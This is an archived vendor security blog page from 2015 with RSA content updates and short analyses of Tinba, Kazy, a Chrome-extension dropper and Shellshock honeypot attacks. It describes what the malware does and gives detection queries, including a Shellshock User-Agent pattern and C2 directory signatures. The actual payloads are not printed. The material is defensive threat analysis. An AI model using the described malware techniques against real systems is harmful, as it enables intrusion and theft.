Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > 2015 > March
2015

RSA Security Analytics customers,


RSA is pleased to announce the addition of new and updated content to the RSA Live Content Library. New content added to RSA Live during the month of March:

 

  • 2 new Application rules for detecting internal web traffic to remote administration tools
  • 29 Updates to Event Streaming Analysis (ESA) rules to provide more targeted rule logic
  • 5 Lua parser updates
  • New Log parser support for Entrust Identity Guard
  • 40 Log parser updates that improve parsing accuracy and support newer versions of event sources

 

 

You can find our latest content catalog here:

 

https://sadocs.emc.com/0_en-us/300_RSA_ContentAndResources

 

Additionally, the RSA Content Team will continue our intensive review of our current ESA rule library.  This effort means there will be less noise and more targeted intelligence with our ESA (correlation) rules.

 

If you have an interesting use case for a piece of content, let us know about it by mailing us at:

 

ASOC.Content@rsa.com

 

Regards,

The ASOC Content Team

 

Tinba is an info stealer malware that uses web injects to trick users of different financial institutions into giving their personal information like social security number, address and credit card information. The malware family; that was first identified by security researchers at Trend Micro and CSIS; got its name from its small size. That’s right, a tiny banker Trojan.


We identified a new Tinba variant in RSA FirstWatch Malware Analysis Systems. This is a screenshot from the investigator module in our RSA Security Analytics instance:


108551


As expected the communication between the infected machine and its C2 domain is encoded and/or encrypted.


108552


Given all the network artifacts mentioned above and assuming the appropriate meta keys are enabled, an analyst can develop an app rule on RSA Security Analytics to detect the malicious traffic. The following query can be used:

    

     directory = '/el0hjkd76ghs65dhj0it/' && action = 'put' && filename = '<none>' && extension = '<none>'    


As of this writing, VirusTotal  has a moderate detection rate of the sample under investigation.


Finally, all of the IOCs from those HTTP sessions were added to RSA FirstWatch Live feeds.

Since its announcement to the public in September of 2014, security researchers have ranked the Shellshock vulnerability as one of the most severe disclosed vulnerabilities. In an attacking scenario, the attacker would send a crafted request to an Internet facing service. If a vulnerable version of the Bash shell was configured to process the request, the attacker would be able to use it to execute commands on a victim machine. Because of this system administrators rushed to apply patches to the Unix-based shell used in many servers around the Internet.


Webservers in the RSA FirstWatch honeypot started receiving crafted HTTP requests that try to exploit the Shellshock bug. Below is a screenshot from RSA Security Analytics that shows how an attacker embeds the malicious code in the User Agent string field of the HTTP header:


108172


In this scenario, the attacker is using the command line to download a perl script to the tmp directory of the victim machine, to run it and then to delete it. The downloaded script is a perlb0t script that has been around for a very long time. The bot communicates with its master through IRC channels. The IP address of the IRC server and the channel name are hard coded in the script. One of the functions in the script suggests the following features of the bot:

  • Port Scanning
  • HTTP Flooding
  • TCP Flooding
  • UDP Flooding
  • Google search of servers running unpatched Mambo software


Below are screenshots of that perl function:


108173


108174


How to detect this using RSA Security Analytics?

 

If indexing is enabled on the client meta key, then you can create an app rule in RSA Security Analytics to detect these kind of scans. The app rule shall use the following query:


client begins '()'


Note: All IOCs from this attack were added to RSA FirstWatch Live feeds.

Knowing that the attackers usually have more time to come up with new ideas and methods to cause harm, those on the defensive side are always looking for new solutions that raise the bar higher for an attacker to do damage. In this blog post, we will discuss how built in security enhancements for popular software can be effective against an attacker.

 

The example we will use starts with an unusual User Agent string found in one of our RSA Security Analytics reports. The sample analyzed was using Google Chrome in its HTTP sessions. Below is a screenshot from RSA Security Analytics that shows HTTP traffic originating from the infected machine:


108167


There are three files of interest in those sessions:

  • lgchknjnpaaohlppjfmhkcpbiibkclfh_.crx
  • external_extensions.json
  • id.php


But looking closely, we can see that the infected machine is also connecting to a blogspot.com sub domain. These are the domains provided by Google Blogger service. In response, the page returned some kind of a code or command to the infected machine:


108168


Running the sample in a more controlled environment showed that the response above is necessary for the binary to continue its malicious behavior. The presence of the string is an indication for the binary that the download server is up so it can download the rest of the files on the infected machine.


Next, the malicious binary reaches out to a domain to download a JSON file, a PHP file and a CRX file:


108170

108169


And the string returned in the session above is used to as the filename in the following one:


108171


On an infected machine that has Google Chrome browser installed, the downloaded JSON file is used to replace the existing external_extensions.json file located under

C:\Program Files\Google\Chrome\Application\40.0.2214.93\default_apps\


The external_extensions.json contains meta information about external extensions to Google Chrome browser. Information like name, version and location of the CRX file for each extension can be found in it. A CRX file has the extension code itself.


The malware downloads the CRX file to the same directory above. It copies itself to a temp directory under the name “YoutubeEveryday.exe”. It also modifies the registry to gain persistency on the system by adding a new entry to the auto run key.


So, the main goal of the malware is to remove all the existing extensions from Google Chrome and install the newly downloaded one.


Unfortunately for the malware (and fortunately for the rest of us), this method doesn’t work anymore. To protect Windows users, Google now allows external extensions installation if they’re only hosted on the Chrome Web Store. You can read more about the steps that Google took to make its popular Chrome browser more secure. This is an example of raising the bar higher for the attacker.


As of this writing, VirusTotal has a low detection rate for the sample under investigation.

 

The IOCs discussed in this blog post were added to RSA FirstWatch Live feeds.

Sometimes, it is really easy to spot the differences between regular and malicious network traffic. In this blog post, we will discuss how to detect a new Kazy based on the traffic originating from a couple of infected virtual machines in RSA FirstWatch Malware Analysis Systems.


The screenshot below shows the HTTP traffic between the bots and their C2 domains:


108165


Using RSA Security Analytics to reconstruct one of those sessions we can see that the User Agent string is missing from the HTTP headers


108166


Given all the network artifacts mentioned above and assuming the appropriate meta keys are enabled, an analyst can develop an app rule on RSA Security Analytics to detect the malicious traffic. The following query can be used:


            directory = '/spa0wejk2490234jsdf0rta/' && action = 'put' && filename = '<none>' && client !exists

 

As of this writing, VirusTotal has a low detection rate of the sample under investigation.


Finally, all of the IOCs from those HTTP sessions were added to RSA FirstWatch Live feeds.

Filter Blog

By date: By tag: